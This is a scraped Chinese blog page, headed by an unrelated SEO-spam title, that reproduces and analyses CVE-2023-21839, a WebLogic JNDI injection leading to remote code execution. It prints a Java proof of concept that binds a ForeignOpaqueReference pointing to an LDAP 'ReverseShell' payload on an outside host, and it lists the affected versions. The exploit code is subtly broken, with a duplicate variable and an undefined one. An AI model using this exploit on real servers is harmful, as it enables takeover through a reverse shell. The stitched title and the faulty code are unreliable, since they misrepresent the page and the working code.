当前位置：首页 > news >正文

网站建设视频百度云/seo排名查询

news 2025/6/30 20:27:12

网站建设视频百度云,seo排名查询,海南企业建站,绍兴网站设计公司前言刷B站的时候给我推的一个WebLogic的比较新的漏洞，可以通过此漏洞直接达到RCE进行getShell的效果，于是就简单复现和分析一下，做个记录。视频链接漏洞简单分析此漏洞是属于WebLogic的JNDI注入漏洞，漏洞造成的原因是Weblo…

前言

刷B站的时候给我推的一个WebLogic的比较新的漏洞，可以通过此漏洞直接达到RCE进行getShell的效果，于是就简单复现和分析一下，做个记录。
视频链接

漏洞简单分析

此漏洞是属于WebLogic的JNDI注入漏洞，漏洞造成的原因是Weblogic的t3或iiop协议支持远程绑定对象到服务端，并且能通过lookup查找，如果远程对象继承OpaqueReference就会调用OpaqueReference.getReferent方法，而getReferent方法中存在context.lookup(remoteJNDIName)的实现，导致了可以使用rmi/ldap协议从远程服务器中调用文件并进行执行。

漏洞利用代码如下：

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;public class CVE_2023_21839{public static void main(String args[]) throws Exception {String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);env.put(Context.PROVIDER_URL, url);InitialContext c=new InitialContext(env);Hashtable<String,String> env = new Hashtable<String,String>();env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");jndiEnvironment.setAccessible(true);jndiEnvironment.set(f,env);Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");remoteJNDIName.setAccessible(true);remoteJNDIName.set(f,"ldap://ip:1389/Basic/ReverseShell/ip/port");c.bind("test",f);c.lookup("test");}}

file

poc中通过InitialContext进行初始化了一个对象，使用反射访问和修改ForeignOpaqueReference的jndiEnvironment和emoteJNDIName进行赋值，将ForeignOpaqueReference远程绑定到JNDI服务，最后调用InitialContext对象的lookup方法执行查找，就可以利用rmi/ldap远程协议进行RCE。之所以绑定ForeignOpaqueReference到服务，因为这个类继承于QpaqueReference接口，当实现此接口的对象从 WLContext 中检索，将由getReferent() 返回对象，通过getReferent()中retVal = context.lookup(evalMacros(this.remoteJNDIName))的实现进行命令执行。

影响版本：
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0